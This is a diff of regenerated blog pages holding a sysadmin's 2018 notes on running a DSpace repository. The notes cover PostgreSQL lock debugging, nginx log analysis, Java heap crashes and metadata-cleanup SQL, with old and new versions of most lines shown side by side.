<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
279 dspaceWeb
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
218
</code></pre><ul>
<li>So I&rsquo;m re-enabling the <code>removeAbandoned</code> setting</li>
<li>I grabbed a snapshot of the active connections in <code>pg_stat_activity</code> for all queries running longer than 2 minutes:</li>
</ul>
<pre><code>dspace=# \copy (SELECT now() - query_start as &quot;runtime&quot;, application_name, usename, datname, waiting, state, query
<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &#34;runtime&#34;, application_name, usename, datname, waiting, state, query
FROM pg_stat_activity
WHERE now() - query_start &gt; '2 minutes'::interval
WHERE now() - query_start &gt; &#39;2 minutes&#39;::interval
ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
COPY 263
</code></pre><ul>
<li>100 of these idle in transaction connections are the following query:</li>
</ul>
<pre><code>SELECT * FROM resourcepolicy WHERE resource_type_id= $1 AND resource_id= $2 AND action_id= $3
<pre tabindex="0"><code>SELECT * FROM resourcepolicy WHERE resource_type_id= $1 AND resource_id= $2 AND action_id= $3
</code></pre><ul>
<li>&hellip; but according to the <a href="https://www.postgresql.org/docs/9.5/static/view-pg-locks.html">pg_locks documentation</a> I should have done this to correlate the locks with the activity:</li>
</ul>
<pre><code>SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;
<pre tabindex="0"><code>SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;
</code></pre><ul>
<li>Tom Desair from Atmire shared some extra JDBC pool parameters that might be useful on my thread on the dspace-tech mailing list:
<ul>
@ -936,7 +935,7 @@ COPY 263
<li>CGSpace crashed today, the first HTTP 499 in nginx&rsquo;s access.log was around 09:12</li>
<li>There&rsquo;s nothing interesting going on in nginx&rsquo;s logs around that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Feb/2018:09:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Feb/2018:09:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
65 197.210.168.174
74 213.55.99.121
74 66.249.66.90
@ -950,12 +949,12 @@ COPY 263
</code></pre><ul>
<li>Looking in dspace.log-2018-02-28 I see this, though:</li>
</ul>
<pre><code>2018-02-28 09:19:29,692 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2018-02-28 09:19:29,692 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>Memory issues seem to be common this month:</li>
</ul>
<pre><code>$ grep -c 'nested exception is java.lang.OutOfMemoryError: Java heap space' dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#39;nested exception is java.lang.OutOfMemoryError: Java heap space&#39; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -987,7 +986,7 @@ dspace.log.2018-02-28:1
</code></pre><ul>
<li>Top ten users by session during the first twenty minutes of 9AM:</li>
</ul>
<pre><code>$ grep -E '2018-02-28 09:(0|1)' dspace.log.2018-02-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code>$ grep -E &#39;2018-02-28 09:(0|1)&#39; dspace.log.2018-02-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq -c | sort -n | tail -n 10
18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
@ -1006,13 +1005,13 @@ dspace.log.2018-02-28:1
<li>I think I&rsquo;ll increase the JVM heap size on CGSpace from 6144m to 8192m because I&rsquo;m sick of this random crashing shit and the server has memory and I&rsquo;d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work</li>
<li>Run the few corrections from earlier this month for sponsor on CGSpace:</li>
</ul>
<pre><code>cgspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 3
</code></pre><ul>
<li>I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)</li>
<li>Eventually it succeeded, but it took about five minutes and I noticed LOTS of locks happening with this query:</li>
</ul>
<pre><code>dspace=# \copy (SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid) to /tmp/locks-aorth.txt;
<pre tabindex="0"><code>dspace=# \copy (SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid) to /tmp/locks-aorth.txt;
</code></pre><ul>
<li>I took a few snapshots during the process and noticed 500, 800, and even 2000 locks at certain times during the process</li>
<li>Afterwards I looked a few times and saw only 150 or 200 locks</li>
@ -1039,15 +1038,15 @@ UPDATE 3
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -24,7 +24,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
Export a CSV of the IITA community metadata for Martin Mueller
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -54,12 +54,12 @@ Export a CSV of the IITA community metadata for Martin Mueller
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -105,7 +105,7 @@ Export a CSV of the IITA community metadata for Martin Mueller
<p class="blog-post-meta">
<time datetime="2018-03-02T16:07:54+02:00">Fri Mar 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -122,8 +122,8 @@ Export a CSV of the IITA community metadata for Martin Mueller
<li>There were some records using a non-breaking space in their AGROVOC subject field</li>
<li>I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p 'fuuu' -f dc.contributor.author -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p &#39;fuuu&#39; -f dc.contributor.author -m 3
</code></pre><ul>
<li>This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character</li>
<li>Add new CRP subject &ldquo;GRAIN LEGUMES AND DRYLAND CEREALS&rdquo; to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/358">#358</a>)</li>
@ -132,16 +132,16 @@ $ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u d
<li>Run all system updates on DSpace Test and reboot server</li>
<li>I ran the <a href="https://gist.github.com/alanorth/24d8081a5dc25e2a4e27e548e7e2389c">orcid-authority-to-item.py</a> script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata</li>
</ul>
<pre><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p 'fuuu' -s http://localhost:8081/solr -d
<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p &#39;fuuu&#39; -s http://localhost:8081/solr -d
</code></pre><ul>
<li>I ran the DSpace cleanup script on CGSpace and it threw an error (as always):</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(150659) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(150659) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);&#39;
UPDATE 1
</code></pre><ul>
<li>Apply the proposed PostgreSQL indexes from DS-3636 (pull request <a href="https://github.com/DSpace/DSpace/pull/1791/">#1791</a> on CGSpace (linode18)</li>
@ -159,7 +159,7 @@ UPDATE 1
<li>This makes the CSV have tons of columns, for example <code>dc.title</code>, <code>dc.title[]</code>, <code>dc.title[en]</code>, <code>dc.title[eng]</code>, <code>dc.title[en_US]</code> and so on!</li>
<li>I think I can fixor at least normalizethem in the database:</li>
</ul>
<pre><code>dspace=# select distinct text_lang from metadatavalue where resource_type_id=2;
<pre tabindex="0"><code>dspace=# select distinct text_lang from metadatavalue where resource_type_id=2;
text_lang
-----------
@ -180,7 +180,7 @@ UPDATE 1
es
(16 rows)
dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('en','EN','En','en_','EN_US','en_U','eng');
dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;en&#39;,&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 122227
dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
text_lang
@ -199,7 +199,7 @@ dspacetest=# select distinct text_lang from metadatavalue where resource_type_id
<li>On second inspection it looks like <code>dc.description.provenance</code> fields use the text_lang &ldquo;en&rdquo; so that&rsquo;s probably why there are over 100,000 fields changed&hellip;</li>
<li>If I skip that, there are about 2,000, which seems more reasonably like the amount of fields users have edited manually, or fucked up during CSV import, etc:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and text_lang in ('EN','En','en_','EN_US','en_U','eng');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
UPDATE 2309
</code></pre><ul>
<li>I will apply this on CGSpace right now</li>
@ -207,20 +207,20 @@ UPDATE 2309
<li>Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the <code>cg.creator.id</code> field</li>
<li>For example, a GREL expression in a custom text facet to get all items with <code>dc.contributor.author[en_US]</code> of a certain author with several name variations (this is how you use a logical OR in OpenRefine):</li>
</ul>
<pre><code>or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
<pre tabindex="0"><code>or(value.contains(&#39;Ceballos, Hern&#39;), value.contains(&#39;Hernández Ceballos&#39;))
</code></pre><ul>
<li>Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:</li>
</ul>
<pre><code>if(isBlank(value), &quot;Hernan Ceballos: 0000-0002-8744-7918&quot;, value + &quot;||Hernan Ceballos: 0000-0002-8744-7918&quot;)
<pre tabindex="0"><code>if(isBlank(value), &#34;Hernan Ceballos: 0000-0002-8744-7918&#34;, value + &#34;||Hernan Ceballos: 0000-0002-8744-7918&#34;)
</code></pre><ul>
<li>One thing that bothers me is that this won&rsquo;t honor author order</li>
<li>It might be better to do batches of these in PostgreSQL with a script that takes the <code>place</code> column of an author into account when setting the <code>cg.creator.id</code></li>
<li>I wrote a Python script to read the author names and ORCID identifiers from CSV and create matching <code>cg.creator.id</code> fields: <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py </a></li>
<li>The CSV should have two columns: author name and ORCID identifier:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Orth, Alan&quot;,Alan S. Orth: 0000-0002-1735-7458
&quot;Orth, A.&quot;,Alan S. Orth: 0000-0002-1735-7458
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Orth, Alan&#34;,Alan S. Orth: 0000-0002-1735-7458
&#34;Orth, A.&#34;,Alan S. Orth: 0000-0002-1735-7458
</code></pre><ul>
<li>I didn&rsquo;t integrate the ORCID API lookup for author names in this script for now because I was only interested in &ldquo;tagging&rdquo; old items for a few given authors</li>
<li>I added ORCID identifers for 187 items by CIAT&rsquo;s Hernan Ceballos, because that is what Elizabeth was trying to do manually!</li>
@ -236,14 +236,14 @@ UPDATE 2309
<li>Peter also wrote to say he is having issues with the Atmire Listings and Reports module</li>
<li>When I logged in to try it I get a blank white page after continuing and I see this in dspace.log.2018-03-11:</li>
</ul>
<pre><code>2018-03-11 11:38:15,592 WARN org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=91C2C0C59669B33A7683570F6010603A:internal_error:-- URL Was: https://cgspace.cgiar.or
<pre tabindex="0"><code>2018-03-11 11:38:15,592 WARN org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=91C2C0C59669B33A7683570F6010603A:internal_error:-- URL Was: https://cgspace.cgiar.or
g/jspui/listings-and-reports
-- Method: POST
-- Parameters were:
-- selected_admin_preset: &quot;ilri authors2&quot;
-- load: &quot;normal&quot;
-- next: &quot;NEXT STEP &gt;&gt;&quot;
-- step: &quot;1&quot;
-- selected_admin_preset: &#34;ilri authors2&#34;
-- load: &#34;normal&#34;
-- next: &#34;NEXT STEP &gt;&gt;&#34;
-- step: &#34;1&#34;
org.apache.jasper.JasperException: java.lang.NullPointerException
</code></pre><ul>
@ -282,7 +282,7 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
<ul>
<li>The error in the DSpace log is:</li>
</ul>
<pre><code>org.apache.jasper.JasperException: java.lang.ArrayIndexOutOfBoundsException: -1
<pre tabindex="0"><code>org.apache.jasper.JasperException: java.lang.ArrayIndexOutOfBoundsException: -1
</code></pre><ul>
<li>The full error is here: <a href="https://gist.github.com/alanorth/ea47c092725960e39610db9b0c13f6ca">https://gist.github.com/alanorth/ea47c092725960e39610db9b0c13f6ca</a></li>
<li>If I do a report for &ldquo;Orth, Alan&rdquo; with the same custom layout it works!</li>
@ -295,16 +295,16 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
<li>I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164</li>
<li>Looking at the CRP subjects on CGSpace I see there is one blank one so I&rsquo;ll just fix it:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value=&#39;&#39;;
</code></pre><ul>
<li>Copy all CRP subjects to a CSV to do the mass updates:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=230 group by text_value order by count desc) to /tmp/crps.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=230 group by text_value order by count desc) to /tmp/crps.csv with csv header;
COPY 21
</code></pre><ul>
<li>Once I prepare the new input forms (<a href="https://github.com/ilri/DSpace/issues/362">#362</a>) I will need to do the batch corrections:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.crp -t correct -m 230 -n -d
</code></pre><ul>
<li>Create a pull request to update the input forms for the new CRP subject style (<a href="https://github.com/ilri/DSpace/pull/366">#366</a>)</li>
</ul>
@ -316,13 +316,13 @@ COPY 21
<li>CGSpace crashed this morning for about seven minutes and Dani restarted Tomcat</li>
<li>Around that time there were an increase of SQL errors:</li>
</ul>
<pre><code>2018-03-19 09:10:54,856 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-03-19 09:10:54,856 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
...
2018-03-19 09:10:54,862 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
</code></pre><ul>
<li>But these errors, I don&rsquo;t even know what they mean, because a handful of them happen every day:</li>
</ul>
<pre><code>$ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
<pre tabindex="0"><code>$ grep -c &#39;ERROR org.dspace.storage.rdbms.DatabaseManager&#39; dspace.log.2018-03-1*
dspace.log.2018-03-10:13
dspace.log.2018-03-11:15
dspace.log.2018-03-12:13
@ -336,7 +336,7 @@ dspace.log.2018-03-19:90
</code></pre><ul>
<li>There wasn&rsquo;t even a lot of traffic at the time (89 AM):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Mar/2018:0[89]:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Mar/2018:0[89]:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.197
92 83.103.94.48
96 40.77.167.175
@ -350,8 +350,8 @@ dspace.log.2018-03-19:90
</code></pre><ul>
<li>Well there is a hint in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So someone was doing something heavy somehow&hellip; my guess is content and usage stats!</li>
<li>ICT responded that they &ldquo;fixed&rdquo; the CGSpace connectivity issue in Nairobi without telling me the problem</li>
@ -367,7 +367,7 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOf
<ul>
<li>DSpace Test has been down for a few hours with SQL and memory errors starting this morning:</li>
</ul>
<pre><code>2018-03-20 08:47:10,177 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-03-20 08:47:10,177 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
...
2018-03-20 08:53:11,624 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
@ -377,21 +377,21 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<li>Abenet told me that one of Lance Robinson&rsquo;s ORCID iDs on CGSpace is incorrect</li>
<li>I will remove it from the controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/367">#367</a>) and update any items using the old one:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Lance W. Robinson: 0000-0002-5224-8644&#39; where resource_type_id=2 and metadata_field_id=240 and text_value like &#39;%0000-0002-6344-195X%&#39;;
UPDATE 1
</code></pre><ul>
<li>Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits</li>
<li>Merge the changes to CRP names to the <code>5_x-prod</code> branch and deploy on CGSpace (<a href="https://github.com/ilri/DSpace/pull/363">#363</a>)</li>
<li>Run corrections for CRP names in the database:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode18) and reboot the server</li>
<li>I started a full Discovery re-index on CGSpace because of the updated CRPs</li>
<li>I see this error in the DSpace log:</li>
</ul>
<pre><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &quot;dc_contributor_author&quot;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &quot;dc_contributor_author&quot;.
<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &#34;dc_contributor_author&#34;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &#34;dc_contributor_author&#34;.
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
@ -415,40 +415,40 @@ java.lang.IllegalArgumentException: No choices plugin was configured for field
<li>Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!</li>
<li>Since we&rsquo;ve migrated the ORCID identifiers associated with the authority data to the <code>cg.creator.id</code> field we can nullify the authorities remaining in the database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
<span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</span></span></code></pre></div><ul>
<li>After this the indexing works as usual and item counts and facets are back to normal</li>
<li>Send Peter a list of all authors to correct:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
<span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</span></span></code></pre></div><ul>
<li>Afterwards we&rsquo;ll want to do some batch tagging of ORCID identifiers to these names</li>
<li>CGSpace crashed again this afternoon, I&rsquo;m not sure of the cause but there are a lot of SQL errors in the DSpace log:</li>
</ul>
<pre><code>2018-03-21 15:11:08,166 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
